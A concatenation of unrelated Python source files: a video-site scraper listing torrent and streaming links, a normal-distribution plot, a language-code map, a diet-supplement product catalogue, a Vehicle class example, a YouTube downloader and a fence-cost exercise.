    caratula = scrapertools.find_single_match(data, '<div class="entry-left">.*?src="([^"]+)"')
    # <a href="http://tumejorjuego.com/download/index.php?link=descargar-torrent/058310_yo-frankenstein-blurayrip-ac3-51.html" title="Descargar torrent de Yo Frankenstein " class="btn-torrent" target="_blank">Descarga tu Archivo torrent!</a>
    patron = 'openTorrent.*?"title=".*?" class="btn-torrent">.*?function openTorrent.*?href = "(.*?)";'
    # scraped torrent link
    url = scrapertools.find_single_match(data, patron)
    if url != "":
        itemlist.append(
            Item(channel=item.channel, action="play", server="torrent", title=title + " [torrent]", fulltitle=title,
                 url=url, thumbnail=caratula, plot=item.plot, folder=False))
    logger.debug("matar %s" % data)
    # scraped watch-online links and download links (single and multi-part)
    data = data.replace("'", '"')
    # Unwrap the modal-popup indirection so the raw server links remain.
    data = data.replace(
        'javascript:;" onClick="popup("http://www.newpct1.com/pct1/library/include/ajax/get_modallinks.php?links=', "")
    data = data.replace("http://tumejorserie.com/descargar/url_encript.php?link=", "")
    data = data.replace("$!", "#!")
    patron_descargar = '<div id="tab2"[^>]+>.*?</ul>'
    patron_ver = '<div id="tab3"[^>]+>.*?</ul>'
    match_ver = scrapertools.find_single_match(data, patron_ver)
    match_descargar = scrapertools.find_single_match(data, patron_descargar)
    patron = '<div class="box1"><img src="([^"]+)".*?' # logo
    patron += '<div class="box2">([^<]+)</div>' # server
    patron += '<div class="box3">([^<]+)</div>' # language
    patron += '<div class="box4">([^<]+)</div>' # quality
    patron += '<div class="box5"><a href="([^"]+)".*?' # link
    patron += '<div class="box6">([^<]+)</div>' # title
    enlaces_ver = re.compile(patron, re.DOTALL).findall(match_ver)
    enlaces_descargar = re.compile(patron, re.DOTALL).findall(match_descargar)
    for logo, servidor, idioma, calidad, enlace, titulo in enlaces_ver:
        # Normalize site server aliases to the framework's server ids.
        servidor = servidor.replace("streamin", "streaminto")
        titulo = titulo + " [" + servidor + "]"
        mostrar_server = True
        if config.get_setting("hidepremium"):
            mostrar_server = servertools.is_server_enabled(servidor)
        if mostrar_server:
            try:
                devuelve = servertools.findvideosbyserver(enlace, servidor)
                if devuelve:
                    enlace = devuelve[0][1]
                    itemlist.append(
                        Item(fanart=item.fanart, channel=item.channel, action="play", server=servidor, title=titulo,
                             fulltitle=item.title, url=enlace, thumbnail=logo, plot=item.plot, folder=False))
            except:
                pass
    for logo, servidor, idioma, calidad, enlace, titulo in enlaces_descargar:
        servidor = servidor.replace("uploaded", "uploadedto")
        # Multi-part downloads come as a space-separated list of part links.
        partes = enlace.split(" ")
        p = 1
        for enlace in partes:
            parte_titulo = titulo + " (%s/%s)" % (p, len(partes)) + " [" + servidor + "]"
            p += 1
            mostrar_server = True
            if config.get_setting("hidepremium"):
                mostrar_server = servertools.is_server_enabled(servidor)
            if mostrar_server:
                try:
                    devuelve = servertools.findvideosbyserver(enlace, servidor)
                    if devuelve:
                        enlace = devuelve[0][1]
                        itemlist.append(Item(fanart=item.fanart, channel=item.channel, action="play", server=servidor,
                                             title=parte_titulo, fulltitle=item.title, url=enlace, thumbnail=logo,
                                             plot=item.plot, folder=False))
                except:
                    pass
    return itemlist
def episodios(item):
    """Collect every episode of a series across all its listing pages,
    parsing both the site's new (<span>-based) and old title formats, then
    sort by season/episode and append the add-to-library entry."""
    logger.info()
    itemlist = []
    infoLabels = item.infoLabels
    data = re.sub(r"\n|\r|\t|\s{2,}", "", httptools.downloadpage(item.url).data)
    data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
    # Discover the last page number from the pagination widget and probe
    # every page; without pagination only item.url is scanned.
    pattern = '<ul class="%s">(.*?)</ul>' % "pagination"  # item.pattern
    pagination = scrapertools.find_single_match(data, pattern)
    if pagination:
        pattern = '<li><a href="([^"]+)">Last<\/a>'
        full_url = scrapertools.find_single_match(pagination, pattern)
        url, last_page = scrapertools.find_single_match(full_url, r'(.*?\/pg\/)(\d+)')
        list_pages = [item.url]
        for x in range(2, int(last_page) + 1):
            response = httptools.downloadpage('%s%s'% (url,x))
            if response.sucess:
                list_pages.append("%s%s" % (url, x))
    else:
        list_pages = [item.url]
    for index, page in enumerate(list_pages):
        logger.debug("Loading page %s/%s url=%s" % (index, len(list_pages), page))
        data = re.sub(r"\n|\r|\t|\s{2,}", "", httptools.downloadpage(page).data)
        data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
        pattern = '<ul class="%s">(.*?)</ul>' % "buscar-list"  # item.pattern
        data = scrapertools.get_match(data, pattern)
        pattern = '<li[^>]*><a href="(?P<url>[^"]+).*?<img src="(?P<thumb>[^"]+)".*?<h2[^>]+>(?P<info>.*?)</h2>'
        matches = re.compile(pattern, re.DOTALL).findall(data)
        for url, thumb, info in matches:
            if "<span" in info:  # new style
                pattern = ".*?[^>]+>.*?Temporada\s*(?P<season>\d+)\s*Capitulo(?:s)?\s*(?P<episode>\d+)" \
                          "(?:.*?(?P<episode2>\d+)?)<.+?<span[^>]+>(?P<lang>.*?)</span>\s*Calidad\s*<span[^>]+>" \
                          "[\[]\s*(?P<quality>.*?)\s*[\]]</span>"
                r = re.compile(pattern)
                match = [m.groupdict() for m in r.finditer(info)][0]
                if match["episode2"]:
                    # Double episode, e.g. "1x01-02".
                    multi = True
                    title = "%s (%sx%s-%s) [%s][%s]" % (item.show, match["season"], str(match["episode"]).zfill(2),
                                                        str(match["episode2"]).zfill(2), match["lang"],
                                                        match["quality"])
                else:
                    multi = False
                    title = "%s (%sx%s) [%s][%s]" % (item.show, match["season"], str(match["episode"]).zfill(2),
                                                     match["lang"], match["quality"])
            else:  # old style
                pattern = "\[(?P<quality>.*?)\].*?\[Cap.(?P<season>\d+)(?P<episode>\d{2})(?:_(?P<season2>\d+)" \
                          "(?P<episode2>\d{2}))?.*?\].*?(?:\[(?P<lang>.*?)\])?"
                r = re.compile(pattern)
                match = [m.groupdict() for m in r.finditer(info)][0]
                # logger.debug("data %s" % match)
                str_lang = ""
                if match["lang"] is not None:
                    str_lang = "[%s]" % match["lang"]
                if match["season2"] and match["episode2"]:
                    multi = True
                    if match["season"] == match["season2"]:
                        title = "%s (%sx%s-%s) %s[%s]" % (item.show, match["season"], match["episode"],
                                                          match["episode2"], str_lang, match["quality"])
                    else:
                        title = "%s (%sx%s-%sx%s) %s[%s]" % (item.show, match["season"], match["episode"],
                                                             match["season2"], match["episode2"], str_lang,
                                                             match["quality"])
                else:
                    title = "%s (%sx%s) %s[%s]" % (item.show, match["season"], match["episode"], str_lang,
                                                   match["quality"])
                    multi = False
            season = match['season']
            episode = match['episode']
            itemlist.append(Item(channel=item.channel, action="findvideos", title=title, url=url, thumbnail=thumb,
                                 quality=item.quality, multi=multi, contentSeason=season,
                                 contentEpisodeNumber=episode, infoLabels = infoLabels))
    # order list
    tmdb.set_infoLabels_itemlist(itemlist, seekTmdb = True)
    if len(itemlist) > 1:
        itemlist = sorted(itemlist, key=lambda it: (int(it.contentSeason), int(it.contentEpisodeNumber)))
    if config.get_videolibrary_support() and len(itemlist) > 0:
        itemlist.append(
            item.clone(title="Añadir esta serie a la videoteca", action="add_serie_to_library", extra="episodios"))
    return itemlist
def search(item, texto):
    """Run a site search for *texto* and return the resulting item list.

    The bare except is deliberate: a single broken channel must not abort
    the global search aggregator, so any failure is logged and [] returned.
    """
    logger.info("search:" + texto)
    try:
        item.post = "q=%s" % texto
        item.pattern = "buscar-list"
        return listado2(item)
    except:
        import sys
        for detail in sys.exc_info():
            logger.error("%s" % detail)
        return []
def newest(categoria):
    """Build the "newest releases" listing; only 'torrent' is handled.

    Fetches the movies page, then the series page, stripping the trailing
    pagination entry from each before merging.
    """
    logger.info()
    itemlist = []
    item = Item()
    try:
        item.extra = 'pelilist'
        if categoria == 'torrent':
            item.url = host+'peliculas/'
            itemlist = listado(item)
            # Drop the trailing ">> next page" pagination entry, if present.
            if itemlist[-1].title == ">> Página siguiente":
                itemlist.pop()
            item.url = host+'series/'
            itemlist.extend(listado(item))
            if itemlist[-1].title == ">> Página siguiente":
                itemlist.pop()
    # The exception is swallowed so that a failing channel does not break
    # the "new releases" aggregator.  NOTE(review): any items gathered
    # before the failure are discarded too — confirm that is intended.
    except:
        import sys
        for line in sys.exc_info():
            logger.error("{0}".format(line))
        return []
    return itemlist
|
983,793 | 04dcf4ea8576d1b6251e1a8db94ba168c3fa7e9b | import math
import pandas as pd # 导入另一个包“pandas” 命名为 pd,理解成pandas是在 numpy 基础上的升级包
import numpy as np #导入一个数据分析用的包“numpy” 命名为 np
import matplotlib.pyplot as plt # 导入 matplotlib 命名为 plt,类似 matlab,集成了许多可视化命令
#jupyter 的魔术关键字(magic keywords)
#在文档中显示 matplotlib 包生成的图形
# 设置图形的风格
#%matplotlib inline
#%config InlineBackend.figure_format = 'retina'
from pandas import DataFrame
# Sample measurements to model; wrapped in a single-column DataFrame 'a'.
data=[148.51,146.65,148.52,150.70,150.42]
time =DataFrame(data)
time.columns = ['a']
print(time)
#time.rename(index=str, columns={"0": "a"},inplace=True)
# ``mean`` — centre of the normal distribution: the sample mean.
mean = time.mean()
mean=mean[0]
# ``std`` — sample standard deviation ...
std = time.std()
#std=std[0]
# ... immediately overridden with the fixed value sqrt(0.2); presumably a
# known population parameter — NOTE(review): confirm this override is intended.
std=math.sqrt(0.2)
# Normal probability density function: x given mu (mean) and sigma (std).
def normfun(x, mu, sigma):
    """Normal probability density at *x* for mean *mu* and std *sigma*."""
    coeff = 1.0 / (sigma * np.sqrt(2 * np.pi))
    exponent = -((x - mu) ** 2) / (2 * sigma ** 2)
    return coeff * np.exp(exponent)
# X axis: sample range start, stop and step.
x = np.arange(142,157,0.1)
# Y axis: the normal density evaluated over x.
y = normfun(x, mean, std)
# Histogram overlay left disabled; ``normed`` normalises bar heights.
#plt.hist(time, bins=10, rwidth=0.9, normed=True)
#plt2=plt.twinx()
plt.plot(x,y)
plt.title('Time distribution')
plt.xlabel('Time')
plt.ylabel('Probability')
# Render the figure.
plt.show() |
983,794 | 1d7adb806f02e1d6937fe38f56261c3f43d46894 | #!/usr/bin/env python3
#coding: utf-8
# All UD 1.4 languages: ISO 639-1-style short code -> ISO 639-3 long code.
# Inline notes record availability in the W2C and Opus corpora.
short2long = {
    "ar": "ara",
    "bg": "bul",
    "ca": "cat",
    "cop": "cop", # no W2C, no Opus
    "cs": "ces",
    "cu": "chu", # no W2C, no Opus
    "da": "dan",
    "de": "deu",
    "el": "ell",
    "en": "eng",
    "es": "spa",
    "et": "est",
    "eu": "eus",
    "fa": "fas",
    "fi": "fin",
    "fr": "fra",
    "ga": "gle", # in Opus: quite a lot, but not OpenSubtitles
    "gl": "glg",
    "got": "got", # no W2C, no Opus
    "grc": "grc", # no W2C, in Opus: Ubuntu
    "he": "heb",
    "hi": "hin",
    "hr": "hrv",
    "hu": "hun",
    "id": "ind",
    "it": "ita",
    "ja": "jpn", # no Delta
    "kk": "kaz",
    "la": "lat", # in Opus: Ubuntu Gnome Tatoeba
    "lv": "lav",
    "nl": "nld",
    "no": "nor",
    "pl": "pol",
    "pt": "por",
    "ro": "ron",
    "ru": "rus",
    "sa": "san", # no W2C, in Opus: Ubuntu
    "sk": "slk",
    "sl": "slv",
    "sv": "swe",
    "swl": "swl", # no W2C, no Opus
    "ta": "tam",
    "tr": "tur",
    "ug": "uig", # no W2C, in Opus: Ubuntu Gnome Tanzil
    "uk": "ukr",
    "vi": "vie",
    "zh": "zho", # no Delta
    }
# Reverse mapping: ISO 639-3 long code -> short code.
# (Was a manual dict()+loop; a dict comprehension is the idiomatic form.)
long2short = {long_code: short_code for short_code, long_code in short2long.items()}

import sys

iso_in = sys.argv[1]
# A 3-letter argument is a long code: print its short form; any other
# length is treated as a short code and translated to the long form.
# An unknown code raises KeyError, as before.
if len(iso_in) == 3:
    print(long2short[iso_in])
else:
    print(short2long[iso_in])
|
983,795 | 46c7f1d46a92a38054a36220ed84a4501b963007 | from diethack import makeProduct, makeProductUnits, makeElements, \
fetchNndb, makeConverter
from random import shuffle
def products():
    """Every product in the diet model: staple foods plus micro supplements."""
    groups = [
        _chickenBreast(),
        _soyProteinSprouts(),
        _soybeanOil(),
        _codLiverOil(),
        _barley(),
        _brownRiceShort(),
        _whiteRiceLong(),
        _wheatBran(),
        _sugar(),
        _tableSalt(),
        _distilledWater(),
        microSupplements(),
    ]
    combined = []
    for group in groups:
        combined.extend(group)
    return combined
def microSupplements():
    """All vitamin/mineral supplement products (salt included for iodine)."""
    groups = [
        _tableSalt(),
        _optiMen(),
        _cholineTablets(),
        _chromiumTablets(),
        _iodineTablets(),
        _biotinTablets(),
        _molybdenumTablets(),
        _potassiumPowder(),
        _potassiumTablets(),
        _floricalTablets(),
        _calciumTablets(),
        _magnesiumTablets(),
        _ironTablets(),
        _vitaminCTablets(),
        _vitaminKTablets(),
        _zincTablets(),
        _riboflavinTablets(),
        _vitaminB12Tablets(),
        _vitaminB6Tablets(),
        _copperTablets(),
        _vitaminETablets(),
        _seleniumTablets(),
        _vitaminDTablets(),
    ]
    combined = []
    for group in groups:
        combined.extend(group)
    return combined
def _convert(**kwargs):
    """Normalise keyword (value, unit) pairs into canonical product units."""
    units = makeProductUnits()
    return makeConverter().convertDict(kwargs, units)
def _fetchNndb(code):
    """Fetch NNDB entry *code* and convert its values to product units."""
    raw = fetchNndb(code)
    return makeConverter().convertDict(raw, makeProductUnits())
def _soyProteinSprouts():
    """Soy protein isolate (NNDB 16122) with local bulk pricing.

    ``dict(a.items() + b.items())`` is Python-2 dict merging: the price
    fields override/extend the fetched nutrition data.
    """
    return [makeProduct(**dict(
        _fetchNndb('16122').items() + {
            'name': 'soy protein isolate bulk "sprouts"',
            'nameShort': 'soy protein',
            'price': 699,
            'priceMass': 453}.items()))]
def _chickenBreast():
    """Chicken breast (NNDB 05062), priced per pound (453 g)."""
    return [makeProduct(**dict(
        _fetchNndb('05062').items() + {
            'name': 'boneless skinless chicken breasts "sprouts"',
            'nameShort': 'chicken breasts',
            'price': 199, # weekly special
            'priceMass': 453}.items()))]
def _soybeanOil():
    """Soybean oil (NNDB 04044), price for an 8 lb bottle."""
    # Density factor 0.922 — presumably converts the volume-labelled bottle
    # size into mass; TODO confirm the 8*453 figure is volume, not weight.
    oilDensK = 0.922
    return [makeProduct(**dict(
        _fetchNndb('04044').items() + {
            'name': 'soybean oil "carlini" (aldi)',
            'nameShort': 'soybean oil',
            'price': 629,
            'priceMass': 8.0*453.0*oilDensK}.items()))]
def _codLiverOil():
    """Cod liver oil (NNDB 04589), price per 355 g bottle."""
    return [makeProduct(**dict(
        _fetchNndb('04589').items() + {
            'name': 'cod liver oil "twinlab"',
            'nameShort': 'cod liver oil',
            'dataUrl': 'http://www.vitacost.com/twinlab-norwegian-cod-liver-oil-unflavored-12-fl-oz',
            'price': 897,
            'priceMass': 355}.items()))]
def _brownRiceShort():
    """Short-grain brown rice (NNDB 20040), priced per pound."""
    return [makeProduct(**dict(
        _fetchNndb('20040').items() + {
            'name': 'brown rice short-grain bulk "sprouts"',
            'nameShort': 'brown rice',
            'price': 99,
            'priceMass': 453}.items()))]
def _whiteRiceLong():
    """Long-grain white rice (NNDB 20044), priced per pound."""
    return [makeProduct(**dict(
        _fetchNndb('20044').items() + {
            'name': 'white rice long-grain bulk "sprouts"',
            'nameShort': 'white rice',
            'price': 99,
            'priceMass': 453}.items()))]
def _barley():
    """Pearl barley (NNDB 20005), priced per pound."""
    return [makeProduct(**dict(
        _fetchNndb('20005').items() + {
            'name': 'pearl barley bulk "sprouts"',
            'nameShort': 'barley',
            'price': 99,
            'priceMass': 453}.items()))]
def _sugar():
    """Granulated sugar (NNDB 19336), price for a 4 lb bag."""
    return [makeProduct(**dict(
        _fetchNndb('19336').items() + {
            'name': 'granulated sugar "baker\'s corner" (aldi)',
            'nameShort': 'sugar',
            'price': 149,
            'priceMass': 4*453}.items()))]
def _wheatBran():
    """Wheat bran (NNDB 20077), price per 2268 g pack."""
    return [makeProduct(**dict(
        _fetchNndb('20077').items() + {
            'name': 'wheat bran "bob\'s red mill"',
            'nameShort': 'wheat bran',
            'dataUrl': 'http://www.amazon.com/gp/product/B004VLVIL4',
            'price': 965,
            'priceMass': 2268}.items()))]
def _tableSalt():
    """Table salt (NNDB 02047), price per 1800 g container."""
    return [makeProduct(**dict(
        _fetchNndb('02047').items() + {
            'name': 'table salt "morton"',
            'nameShort': 'salt',
            'price': 97,
            'priceMass': 1800}.items()))]
def _optiMen():
    """Opti-Men multivitamin; label amounts are per 3-tablet serving."""
    # source: package
    return [makeProduct(
        name = 'vitamins opti-men "optimum nutrition"',
        price = 2149,
        priceMass = 180,
        **_convert(
            elementsMass = (3, 'g'), # 3 tablets
            elements = makeElements(
                calcium = (200, 'mg'),
                vitaminA = (10000, 'IU_vitaminA_betacarotine_sup'),
                vitaminC = (300, 'mg'),
                vitaminD = (300, 'IU_vitaminD'),
                vitaminE = (200, 'IU_vitaminE_d_alphatocopherol'),
                vitaminESup = (200, 'IU_vitaminE_d_alphatocopherol'),
                vitaminK = (75, 'mcg'),
                thiamin = (75, 'mg'),
                riboflavin = (75, 'mg'),
                niacin = (75, 'mg'),
                niacinSup = (75, 'mg'),
                vitaminB6 = (50, 'mg'),
                folate = (600, 'mcg_folicAcid'),
                folateSup = (600, 'mcg_folicAcid'),
                vitaminB12 = (100, 'mcg'),
                pantothenicAcid = (75, 'mg'),
                biotin = (300, 'mcg'),
                choline = (10, 'mg'),
                chromium = (120, 'mcg'),
                copper = (2, 'mg'),
                iodine = (150, 'mcg'),
                magnesium = (100, 'mg'),
                magnesiumSup = (100, 'mg'),
                manganese = (5, 'mg'),
                molybdenum = (80, 'mcg'),
                selenium = (200, 'mcg'),
                zinc = (30, 'mg'),
                boron = (2, 'mg'),
                silicon = (5, 'mg'),
                vanadium = (100, 'mcg')
            )))]
def _distilledWater():
    """Distilled water: free, 100% water by mass."""
    return [makeProduct(
        name = 'distilled water',
        nameShort = 'water',
        price = 0,
        priceMass = 100,
        **_convert(
            elementsMass = (100, 'g'),
            elements = makeElements(
                water = (100, 'g')
            )))]
def _cholineTablets():
    """Choline tablets, 500 mg per tablet; price per 100-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'choline tablets "nature\'s way"',
        nameShort = 'choline',
        dataUrl = 'http://www.vitacost.com/natures-way-choline',
        price = 639,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                choline = (500, 'mg')
            )))]
def _chromiumTablets():
    """Chromium picolinate tablets, 200 mcg each; 300-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'chromium picolinate tablets "vitacost"',
        nameShort = 'Cr',
        dataUrl = 'http://www.vitacost.com/vitacost-chromium-picolinate',
        price = 939,
        priceMass = 300, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                chromium = (200, 'mcg')
            )))]
def _iodineTablets():
    """Kelp (iodine) tablets, 400 mcg each; 180-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'kelp tablets "nature\'s way"',
        nameShort = 'I',
        dataUrl = 'http://www.vitacost.com/natures-way-kelp',
        price = 569,
        priceMass = 180, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                iodine = (400, 'mcg')
            )))]
def _biotinTablets():
    """Biotin tablets, 600 mcg each; 200-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'biotin "source naturals"',
        nameShort = 'biotin',
        dataUrl = 'http://www.vitacost.com/source-naturals-biotin-600-mcg-200-tablets',
        price = 709,
        priceMass = 200, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                biotin = (600, 'mcg')
            )))]
def _molybdenumTablets():
    """Molybdenum microtablets, 250 mcg each; 100-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'molybdenum tablets "kal"',
        nameShort = 'Mo',
        dataUrl = 'http://www.vitacost.com/kal-molybdenum-chelated-250-mcg-100-microtablets',
        price = 499,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                molybdenum = (250, 'mcg')
            )))]
def _potassiumPowder():
    """Potassium chloride powder: 730 mg K per 1.4 g serving, 1 kg bag."""
    # source: http://www.iherb.com/Now-Foods-Potassium-Chloride-Powder-8-oz-227-g/777
    return [makeProduct(
        name = 'potassium chloride powder "bulk supplements"',
        nameShort = 'K',
        dataUrl = 'http://www.amazon.com/BulkSupplements-Potassium-Chloride-Powder-grams/dp/B00ENS39WG',
        price = 1996,
        **_convert(
            priceMass = (1000, 'g'),
            elementsMass = (1.4, 'g'),
            elements = makeElements(
                potassium = (730, 'mg')
            )))]
def _potassiumTablets():
    """Potassium citrate tablets, 99 mg K each; 300-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'potassium citrate "vitacost"',
        nameShort = 'K2',
        dataUrl = 'http://www.vitacost.com/vitacost-potassium-citrate',
        price = 699,
        priceMass = 300, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                potassium = (99, 'mg')
            )))]
def _floricalTablets():
    """Florical tablets: calcium plus fluoride; 100-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'florical tablets "mericon"',
        nameShort = 'F',
        dataUrl = 'http://www.amazon.com/Florical-Calcium-Fluoride-supplements-Industries/dp/B000M4C5TS',
        price = 1359,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                calcium = (145, 'mg'),
                fluoride = (3.75, 'mg')
            )))]
def _calciumTablets():
    """Two calcium products: plain Caltrate and a Ca+D3 softgel."""
    res = []
    # source: online shop
    res += [makeProduct(
        name = 'calcium dietary supplement "caltrate"',
        nameShort = 'Ca1',
        price = 1493,
        priceMass = 150, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                calcium = (600, 'mg')
            )))]
    # source: online shop
    res += [makeProduct(
        name = 'ultra calcium with vitamin d3 "vitacost"',
        nameShort = 'Ca2',
        dataUrl = 'http://www.vitacost.com/vitacost-ultra-calcium-1200-mg-with-vitamin-d3-700-iu-per-serving-300-softgels-7',
        price = 1149,
        priceMass = 150, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                energy = (10, 'kcal'),
                fat = (1, 'g'),
                calcium = (1200, 'mg')
            )))]
    return res
def _magnesiumTablets():
    """Magnesium capsules, 400 mg each; 200-capsule bottle."""
    # source: online shop
    return [makeProduct(
        name = 'magnesium tablets "vitacost"',
        nameShort = 'Mg',
        dataUrl = 'http://www.vitacost.com/vitacost-magnesium-400-mg-200-capsules-1',
        price = 649,
        priceMass = 200, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                magnesium = (400, 'mg'),
                magnesiumSup = (400, 'mg')
            )))]
def _ironTablets():
    """Iron tablets, 65 mg each; price per 180-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'iron tablets "nature made"',
        # Added nameShort for consistency with the other mineral tablets
        # (Cr, Mo, Mg, Zn, ...), which all define one.
        nameShort = 'Fe',
        price = 674,
        priceMass = 180, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                iron = (65, 'mg')
            )))]
def _vitaminCTablets():
    """Vitamin C capsules, 1000 mg each; 250-capsule bottle."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin c tablets "vitacost"',
        nameShort = 'vit c',
        dataUrl = 'http://www.vitacost.com/vitacost-vitamin-c-1000-mg-250-capsules',
        price = 1176,
        priceMass = 250, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                vitaminC = (1000, 'mg')
            )))]
def _vitaminKTablets():
    """Vitamin K complex softgels (400 mcg K + 10 mg C each)."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin k tablets "vitacost"',
        nameShort = 'vit k',
        dataUrl = 'http://www.vitacost.com/vitacost-vitamin-k-complex-with-k1-k2-400-mcg-180-softgels',
        price = 2499,
        priceMass = 180, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                vitaminK = (400, 'mcg'),
                vitaminC = (10, 'mg')
            )))]
def _zincTablets():
    """Zinc tablets, 30 mg each; 200-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'zinc tablets "vitacost"',
        nameShort = 'Zn',
        dataUrl = 'http://www.vitacost.com/vitacost-l-optizinc',
        price = 899,
        priceMass = 200, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                zinc = (30, 'mg')
            )))]
def _riboflavinTablets():
    """Riboflavin (B2) tablets, 50 mg each; 100-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin b-2 "solgar"',
        nameShort = 'vit b2',
        dataUrl = 'http://www.vitacost.com/solgar-vitamin-b2-riboflavin-50-mg-100-tablets',
        price = 719,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                riboflavin = (50, 'mg')
            )))]
def _vitaminB12Tablets():
    """Vitamin B12 tablets, 100 mcg each; 100-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin b-12 tablets "solgar"',
        nameShort = 'vit b12',
        dataUrl = 'http://www.vitacost.com/solgar-vitamin-b12-100-mcg-100-tablets',
        price = 559,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                vitaminB12 = (100, 'mcg')
            )))]
def _vitaminB6Tablets():
    """Vitamin B6 tablets, 100 mg each (plus 1 g carbs filler)."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin b-6 "nature\'s way"',
        price = 639,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                carb = (1, 'g'),
                vitaminB6 = (100, 'mg')
            )))]
def _copperTablets():
    """Copper tablets, 2 mg each; 100-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'copper tablets "twinlab"',
        price = 621,
        priceMass = 100, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                copper = (2, 'mg')
            )))]
def _vitaminETablets():
    """Vitamin E softgels, 200 IU each; 60-softgel bottle."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin e "vitacost"',
        nameShort = 'vit e',
        dataUrl = 'http://www.vitacost.com/vitacost-gamma-e-tocopherol-complex-200-iu-60-softgels',
        price = 899,
        priceMass = 60, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                vitaminE = (200, 'IU_vitaminE_d_alphatocopherol'),
                vitaminESup = (200, 'IU_vitaminE_d_alphatocopherol')
            )))]
def _seleniumTablets():
    """Selenium tablets, 200 mcg each; 90-tablet bottle."""
    # source: online shop
    return [makeProduct(
        name = 'hypo-selenium tablets "douglas laboratories"',
        price = 1160,
        priceMass = 90, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                selenium = (200, 'mcg')
            )))]
def _vitaminDTablets():
    """Vitamin D3 capsules, 1000 IU each; 200-capsule bottle."""
    # source: online shop
    return [makeProduct(
        name = 'vitamin d "vitacost"',
        nameShort = 'vit d',
        dataUrl = 'http://www.vitacost.com/vitacost-vitamin-d3-as-cholecalciferol-1000-iu-200-capsules-1',
        price = 599,
        priceMass = 200, # tablets
        elementsMass = 1,
        **_convert(
            elements = makeElements(
                vitaminD = (1000, 'IU_vitaminD')
            )))]
|
983,796 | 92ce220e1c8560ef2ba7a0dd7bfb90d5f6555ada | from abc import ABCMeta, abstractmethod
class Vehicle(object):
    """A vehicle for sale.

    Subclasses define ``wheels`` and ``base_sale_price``; instances are
    expected to carry ``sold_on`` and ``miles`` before the price methods
    are called.
    """
    # NOTE(review): ``__metaclass__`` is Python-2 syntax and is silently
    # ignored by Python 3, so abstractness is NOT enforced there; a
    # Python-3 port would use ``class Vehicle(metaclass=ABCMeta)``.
    __metaclass__ = ABCMeta
    base_sale_price = 0

    def sale_price(self):
        """Return the sale price ($5000 per wheel), or 0.0 while unsold."""
        if self.sold_on is None:
            return 0.0
        return 5000.0 * self.wheels

    def purchase_price(self):
        """Return base price minus $0.10 per mile, or 0.0 while unsold."""
        if self.sold_on is None:
            return 0.0
        return self.base_sale_price - (.10 * self.miles)

    @abstractmethod
    def vehicle_type(self):  # fixed: abstract instance method must take self
        """Return a string representing the type of vehicle this is."""
        pass
class Car(Vehicle):
    """A passenger car: four wheels, $8000 base sale price."""

    wheels = 4
    base_sale_price = 8000

    def vehicle_type(self):
        """Identify this vehicle as a car."""
        return 'car'
class Truck(Vehicle):
    """A truck: four wheels, $10000 base sale price."""

    wheels = 4
    base_sale_price = 10000

    def vehicle_type(self):
        """Identify this vehicle as a truck."""
        return 'Truck'
# Attempt to instantiate the abstract base class.  Under Python 2 this
# raises TypeError; under Python 3 ``__metaclass__`` is ignored, so it
# silently succeeds — presumably a demonstration line; confirm intent.
v = Vehicle()
|
983,797 | a42820ec49fe9f19f2fb99284f448538f60a3f81 | from pytube import YouTube
# Download the first available stream of every YouTube URL listed in
# musicList.txt (one URL per line).
filename = "musicList.txt"
# Fixed: the file handle was never closed; 'with' guarantees cleanup.
with open(filename, "r") as url_file:
    for videoURL in url_file:
        # Fixed: strip the trailing newline before handing the URL to
        # pytube, and skip blank lines instead of crashing on them.
        videoURL = videoURL.strip()
        if not videoURL:
            continue
        print(videoURL)
        yt = YouTube(videoURL)
        stream = yt.streams.first()
        stream.download("./")
        print('下載完成')
|
983,798 | 28b1e6d667c93b556719a9e71e8cb280d0b31eb2 | """
Faça um programa para ler as dimensões de um terreno(comprimento C e largura L),
bem como o preço do metro de tela P. Imprima o custo para cercar este mesmo
terreno com tela.
"""
comprimento = float(input("Comprimento(C): "))
largura = float(input("Largura: (L)"))
preco = float(input("Preço do metro de tela (P): "))
# Fixed: the fencing cost is the perimeter times the price per metre of
# fence — 2*(C+L)*P — not area*price as originally computed (the module
# docstring asks for the cost "para cercar", i.e. to fence around).
valor = 2 * (comprimento + largura) * preco
